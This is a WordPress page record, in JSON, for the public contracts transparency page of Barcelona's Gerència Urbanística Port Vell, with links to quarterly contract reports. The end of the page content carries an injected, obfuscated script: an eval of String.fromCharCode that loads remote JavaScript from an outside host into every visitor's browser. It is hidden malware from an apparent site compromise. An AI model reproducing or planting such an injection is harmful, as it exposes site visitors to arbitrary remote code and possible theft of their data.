{"id":2868,"date":"2019-03-27T08:56:38","date_gmt":"2019-03-27T07:56:38","guid":{"rendered":"https:\/\/portvellbcn.cat\/?page_id=2868"},"modified":"2019-04-17T12:21:32","modified_gmt":"2019-04-17T10:21:32","slug":"contractacio","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/ca\/contractacio\/","title":{"rendered":"Contractaci\u00f3"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row css=&#8221;.vc_custom_1554715443955{padding-top: 100px !important;}&#8221; el_class=&#8221;azul&#8221;][vc_column][vc_text_separator title=&#8221;Contractaci\u00f3&#8221; i_icon_fontawesome=&#8221;fa fa-handshake-o&#8221; title_align=&#8221;separator_align_left&#8221; color=&#8221;white&#8221; i_color=&#8221;custom&#8221; add_icon=&#8221;true&#8221; i_custom_color=&#8221;#1b8fe8&#8243;][vc_column_text]A m\u00e9s de la informaci\u00f3 relativa a contractes publicada en el Perfil del Contractant del web de la Ger\u00e8ncia Urban\u00edstica Port Vell i a la Plataforma de Contractaci\u00f3 de l\u2019Estat, mitjan\u00e7ant els enlla\u00e7os que figuren a continuaci\u00f3 podeu descarregar-vos els continguts seg\u00fcents:[\/vc_column_text][vc_column_text css=&#8221;.vc_custom_1554878385283{padding-top: 40px !important;}&#8221;]Relaci\u00f3 de contractes adjudicats trimestralment per la Ger\u00e8ncia Urban\u00edstica Port Vell, amb les dades que s\u2019estableixen a la Llei 19\/2013, de 9 de desembre, i a la Llei 9\/2017, de 8 de novembre, de contractes del sector p\u00fablic.[\/vc_column_text][vc_column_text css=&#8221;.vc_custom_1554878758846{padding-top: 40px !important;}&#8221;]Relaci\u00f3 de contractes menors adjudicats trimestralment per la Ger\u00e8ncia Urban\u00edstica Port Vell, amb les dades que s\u2019estableixen a la Llei 19\/2013, de 9 de desembre, i a la Llei 9\/2017, de 8 de novembre, de contractes del sector p\u00fablic.[\/vc_column_text][vc_tta_accordion active_section=&#8221;-1&#8243; collapsible_all=&#8221;true&#8221;][vc_tta_section title=&#8221;Any 2018&#8243; tab_id=&#8221;1554879437897-1461bed5-58ea&#8221;][vc_column_text el_class=&#8221;transparencia&#8221;]Consulta els pressupostos de l&#8217;any 2018 al seg\u00fcent enlla\u00e7 <a href=\"https:\/\/portvellbcn.cat\/wp-content\/uploads\/2019\/03\/Pressupost-2018.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Veure enlla\u00e7<\/a>[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Any 2019&#8243; tab_id=&#8221;1554879437916-40e3f9a1-4d40&#8243;][vc_column_text el_class=&#8221;transparencia&#8221;]Podeu consultar els Contractes Majors 1er trimestre\u00a0 al seg\u00fcent enlla\u00e7 <a href=\"https:\/\/portvellbcn.cat\/wp-content\/uploads\/2019\/04\/Contractes-Majors-1r-Trimestre.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Veure enlla\u00e7<\/a>[\/vc_column_text][vc_column_text el_class=&#8221;transparencia&#8221;]Podeu consultar els Contractes Menors 1er trimestre al seg\u00fcent enlla\u00e7 <a href=\"https:\/\/portvellbcn.cat\/wp-content\/uploads\/2019\/04\/Contractes-Menors-1r-Trimestre.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Veure enlla\u00e7<\/a>[\/vc_column_text][vc_column_text el_class=&#8221;transparencia&#8221;]Podeu consultar els percentatges dels contractes <a href=\"https:\/\/portvellbcn.cat\/wp-content\/uploads\/2019\/04\/Gr\u00e0fics-percentatge-Contractes-Majors-1r-Trimestre.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Veure enlla\u00e7<\/a>[\/vc_column_text][\/vc_tta_section][\/vc_tta_accordion][vc_column_text css=&#8221;.vc_custom_1554717180919{padding-top: 40px !important;}&#8221;]Dades estad\u00edstiques sobre el percentatge en volum pressupostari de contractes adjudicats mitjan\u00e7ant cada un dels procediments previstos en la legislaci\u00f3 de contractes del sector p\u00fablic.[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=&#8221;120px&#8221;][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row css=&#8221;.vc_custom_1554715443955{padding-top: 100px !important;}&#8221; el_class=&#8221;azul&#8221;][vc_column][vc_text_separator title=&#8221;Contractaci\u00f3&#8221; i_icon_fontawesome=&#8221;fa fa-handshake-o&#8221; title_align=&#8221;separator_align_left&#8221; color=&#8221;white&#8221; i_color=&#8221;custom&#8221; add_icon=&#8221;true&#8221; i_custom_color=&#8221;#1b8fe8&#8243;][vc_column_text]A m\u00e9s de la informaci\u00f3 relativa a contractes publicada en el Perfil del Contractant del web de la Ger\u00e8ncia Urban\u00edstica Port Vell i a la Plataforma de Contractaci\u00f3 de l\u2019Estat, mitjan\u00e7ant els enlla\u00e7os que figuren a continuaci\u00f3 podeu descarregar-vos els continguts seg\u00fcents:[\/vc_column_text][vc_column_text css=&#8221;.vc_custom_1554878385283{padding-top: 40px !important;}&#8221;]Relaci\u00f3 de contractes adjudicats trimestralment per la Ger\u00e8ncia Urban\u00edstica Port Vell, amb les dades que s\u2019estableixen a la Llei 19\/2013, de 9 de desembre, i a la Llei 9\/2017, de 8 de novembre, de contractes del sector p\u00fablic.[\/vc_column_text][vc_column_text css=&#8221;.vc_custom_1554878758846{padding-top: 40px !important;}&#8221;]Relaci\u00f3 de contractes menors adjudicats trimestralment per la Ger\u00e8ncia Urban\u00edstica Port Vell, amb les dades que s\u2019estableixen a la Llei 19\/2013, de 9 de desembre, i a la Llei 9\/2017, de 8 de novembre, de contractes del sector p\u00fablic.[\/vc_column_text][vc_tta_accordion active_section=&#8221;-1&#8243; collapsible_all=&#8221;true&#8221;][vc_tta_section title=&#8221;Any 2018&#8243; tab_id=&#8221;1554879437897-1461bed5-58ea&#8221;][vc_column_text el_class=&#8221;transparencia&#8221;]Consulta els pressupostos de l&#8217;any 2018 al seg\u00fcent enlla\u00e7 Veure enlla\u00e7[\/vc_column_text][\/vc_tta_section][vc_tta_section title=&#8221;Any 2019&#8243; tab_id=&#8221;1554879437916-40e3f9a1-4d40&#8243;][vc_column_text el_class=&#8221;transparencia&#8221;]Podeu consultar els Contractes Majors 1er trimestre\u00a0 al seg\u00fcent enlla\u00e7 Veure enlla\u00e7[\/vc_column_text][vc_column_text el_class=&#8221;transparencia&#8221;]Podeu consultar els Contractes Menors 1er trimestre al seg\u00fcent enlla\u00e7 Veure enlla\u00e7[\/vc_column_text][vc_column_text el_class=&#8221;transparencia&#8221;]Podeu consultar els percentatges dels contractes Veure enlla\u00e7[\/vc_column_text][\/vc_tta_section][\/vc_tta_accordion][vc_column_text css=&#8221;.vc_custom_1554717180919{padding-top: 40px !important;}&#8221;]Dades estad\u00edstiques sobre el percentatge en volum pressupostari de contractes adjudicats mitjan\u00e7ant [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/page-creative-medium-dark.php","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-2868","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/2868","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/comments?post=2868"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/pages\/2868\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/ca\/wp-json\/wp\/v2\/media?parent=2868"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}